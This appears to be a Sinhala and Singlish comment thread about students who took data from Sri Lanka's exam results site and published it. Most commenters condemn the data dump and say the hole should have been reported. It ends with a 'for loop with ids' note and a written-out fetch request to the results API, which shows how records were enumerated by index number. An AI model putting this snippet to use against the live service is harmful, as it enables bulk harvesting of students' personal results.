ඌ පට්ට දක්ශයෙක්
පව් කොල්ලා..දැන් ඉතින් කරන්න දෙයක් නෑ
පව් කොල්ලා..දැන් ඉතින් කරන්න දෙයක් නෑ


Uwa arrest karanna newei, job ekak deela loopholes wassawannai melo rahak nathi gov websites tika hadawannai thiyenne.
@BatapolaAntana dananwa athivulnerability eka mkadda danne na
Even scrip kiddi can hack Sri Lankan web apps, His deed isn't legitimate
ඔව් එකගයි නීතිය පැත්තෙන්.කරලා තියෙන්නේ වැරද්දක්. දක්ෂයෙක් උනත් වැරද්දක් කරාම අගයන එක වැරදි.
සයිට් එකේ ප්‍රශ්න තියනවා නම් ඒව රිපෝට් කරන්න ඕනේ. නැතුව data dump එකක් අරන් වෙන තැනක publish කරන එක නෙමේ.
දක්ෂයෙක් උනත් බොරුවට පුම්බන එක වැරදි
report karala un loophole eka wahuwe nattan data dump ekakata yana eka sadaranai.කරලා තියෙන්නේ වැරද්දක්. දක්ෂයෙක් උනත් වැරද්දක් කරාම අගයන එක වැරදි.
සයිට් එකේ ප්‍රශ්න තියනවා නම් ඒව රිපෝට් කරන්න ඕනේ. නැතුව data dump එකක් අරන් වෙන තැනක publish කරන එක නෙමේ.
දක්ෂයෙක් උනත් බොරුවට පුම්බන එක වැරදි

In Sri Lanka cyber crimals're overratedකරලා තියෙන්නේ වැරද්දක්. දක්ෂයෙක් උනත් වැරද්දක් කරාම අගයන එක වැරදි.
සයිට් එකේ ප්‍රශ්න තියනවා නම් ඒව රිපෝට් කරන්න ඕනේ. නැතුව data dump එකක් අරන් වෙන තැනක publish කරන එක නෙමේ.
දක්ෂයෙක් උනත් බොරුවට පුම්බන එක වැරදි
හැකින්, කෝඩිං සහ පෝග්‍රෑම් සම්බන්ධයෙන් දිගින් දිගට ම සාකච්ඡා කරමින් මෙලෙස අනවසරයෙන් කටයුතු කළ මොවුන් කණ්ඩායම උසස් පෙළ දක්ෂ පාසල් සිසුන් බව ත් විමර්ශන නිලධාරීහු සඳහන් කරති. මෙලෙස වෙබ් අඩවියකට ඇතුළු වී එහි දත්ත සොරාගැනීම ඉතා අසීරු කටයුත්තක් නමුත් සිසුන්ගේ දක්ෂකම නිසා ඔවුන් මෙසේ කටයුතු කර ඇති බව ද වාර්තා වේ.

for loop with ids
await fetch("https://result.doenets.lk/result/service/AlResult?index=4545454&nic=", {
"credentials": "omit",
"headers": {
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Sec-Fetch-Dest": "empty",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Site": "same-site"
},
"referrer": "https://www.doenets.lk/",
"method": "GET",
"mode": "cors"
});